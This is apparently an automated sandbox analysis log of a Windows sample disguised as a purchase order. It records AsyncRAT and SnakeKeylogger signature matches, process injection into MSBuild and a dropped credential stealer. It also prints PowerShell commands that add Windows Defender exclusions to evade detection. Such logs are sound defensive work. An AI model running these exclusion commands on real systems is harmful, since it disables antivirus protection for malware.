Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06982288 14_2_06982288
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06981BA8 14_2_06981BA8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06980B30 14_2_06980B30
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06985028 14_2_06985028
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06982970 14_2_06982970
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698E6B0 14_2_0698E6B0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698E6A0 14_2_0698E6A0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698DE00 14_2_0698DE00
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698EF51 14_2_0698EF51
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698EF60 14_2_0698EF60
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698CCA0 14_2_0698CCA0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698DDFF 14_2_0698DDFF
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698DDF1 14_2_0698DDF1
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698D550 14_2_0698D550
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698D540 14_2_0698D540
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698EAF8 14_2_0698EAF8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698E258 14_2_0698E258
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698E24A 14_2_0698E24A
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06982278 14_2_06982278
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06988B91 14_2_06988B91
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698F3B8 14_2_0698F3B8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06988BA0 14_2_06988BA0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06989BFA 14_2_06989BFA
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698EB08 14_2_0698EB08
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06989328 14_2_06989328
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06980B20 14_2_06980B20
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06981B77 14_2_06981B77
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698D0F8 14_2_0698D0F8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698D0E9 14_2_0698D0E9
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06985018 14_2_06985018
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698F810 14_2_0698F810
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698F802 14_2_0698F802
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06980006 14_2_06980006
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06980040 14_2_06980040
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698D999 14_2_0698D999
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698D9A8 14_2_0698D9A8
One or more processes crash
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2244 -s 1048
PE file does not import any functions
Source: BQ_PO#385995.exe Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: BQ_PO#385995.exe, 00000000.00000002.2258559792.000002760A47C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXClNEW.exe4 vs BQ_PO#385995.exe
Source: BQ_PO#385995.exe, 00000000.00000002.2258092452.00000276089C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameApihijiqobiboxaw> vs BQ_PO#385995.exe
Source: BQ_PO#385995.exe Binary or memory string: OriginalFilenamePatekPorot.exe4 vs BQ_PO#385995.exe
Yara signature match
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.MSBuild.exe.7240000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 3.2.MSBuild.exe.7240000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.MSBuild.exe.45b5fa8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 3.2.MSBuild.exe.45b5fa8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.MSBuild.exe.45b5fa8.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 3.2.MSBuild.exe.45b5fa8.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.MSBuild.exe.7240000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 3.2.MSBuild.exe.7240000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4586871157.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4616809591.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000003.00000002.4616809591.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000000.00000002.2258559792.000002760A47C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.4606149598.000000000441A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: MSBuild.exe PID: 6524, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: ubygsn.exe PID: 3700, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: BQ_PO#385995.exe Static PE information: Section: .rsrc ZLIB complexity 0.9984774025537635
Source: BQ_PO#385995.exe, -------------.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: ubygsn.exe.3.dr, J-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: ubygsn.exe.3.dr, J-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: ubygsn.exe.3.dr, 2.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@15/16@4/4
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\I1KOVoZcD6Qqbmm9
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\ubygsn.exe Jump to behavior
Source: BQ_PO#385995.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BQ_PO#385995.exe Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ubygsn.exe, 0000000E.00000002.4593828211.0000000003042000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000003024000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000003034000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000003067000.00000004.00000800.00020000.00000000.sdmp, ubygsn.exe, 0000000E.00000002.4593828211.0000000003073000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BQ_PO#385995.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\BQ_PO#385995.exe File read: C:\Users\user\Desktop\BQ_PO#385995.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\BQ_PO#385995.exe "C:\Users\user\Desktop\BQ_PO#385995.exe"
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2244 -s 1048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msbuild.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Users\user\AppData\Local\Temp\ubygsn.exe "C:\Users\user\AppData\Local\Temp\ubygsn.exe"
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msbuild.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Users\user\AppData\Local\Temp\ubygsn.exe "C:\Users\user\AppData\Local\Temp\ubygsn.exe" Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
